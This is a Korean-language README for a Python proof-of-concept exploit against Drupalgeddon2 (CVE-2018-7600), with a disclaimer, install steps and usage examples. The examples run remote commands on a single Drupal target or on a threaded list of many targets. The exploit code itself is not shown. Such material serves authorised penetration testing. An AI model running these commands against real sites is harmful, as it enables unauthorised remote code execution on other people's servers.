
이 저장소는 Drupal 7 및 8 코어 버전에 영향을 미치는 치명적인 원격 코드 실행 취약점인 Drupalgeddon 2로도 알려진 CVE-2018-7600에 대한 완전히 독창적이고 자체 개발된 개념 증명(PoC)을 포함하고 있습니다.
이 저장소는 Drupal의 치명적인 원격 코드 실행 취약점인 Drupalgeddon2(CVE-2018-7600)를 위한 Python 기반 개념 증명(PoC) 익스플로잇을 포함합니다. 이 스크립트는 교육 목적과 보안 전문가가 승인된 침투 테스트 시나리오에서 사용하도록 설계되었습니다.
이 도구는 법적 및 윤리적 목적으로만 사용됩니다. 소유자의 명시적 허가 없이 어떤 시스템에서든 이 스크립트를 사용하는 것은 불법입니다. 작성자와 기여자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있습니다.
requests 라이브러리colorama 라이브러리git clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
이 스크립트는 실행을 사용자 지정할 수 있는 여러 명령줄 인자를 제공합니다.
기본 명령(whoami)으로 단일 대상 익스플로잇:
python3 drupalgeddon2.py -t http://example.com
사용자 지정 명령(예: ls -la)으로 단일 대상 익스플로잇:
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
파일에서 대상 목록 스캔:
targets.txt 파일을 만들고 각 줄에 URL 하나씩 작성합니다:
http://site1.com
https://site2.org
http://site3.net
그런 다음 스크립트를 실행합니다:
python3 drupalgeddon2.py -l targets.txt
사용자 지정 명령과 증가된 스레드로 목록 스캔:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
출력을 로그 파일로 저장:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Short | Description | Default |
|---|
--target | -t | 단일 대상 URL. | - |
--list | -l | 대상 URL 목록이 포함된 파일의 경로. | - |
--command | -c | 대상에서 실행할 명령. | whoami |
--threads | -T | 사용할 동시 스레드 수. | 5 |
--output | -o | 출력을 기록할 파일. | - |
--timeout | 요청 시간 초과(초). | 15 |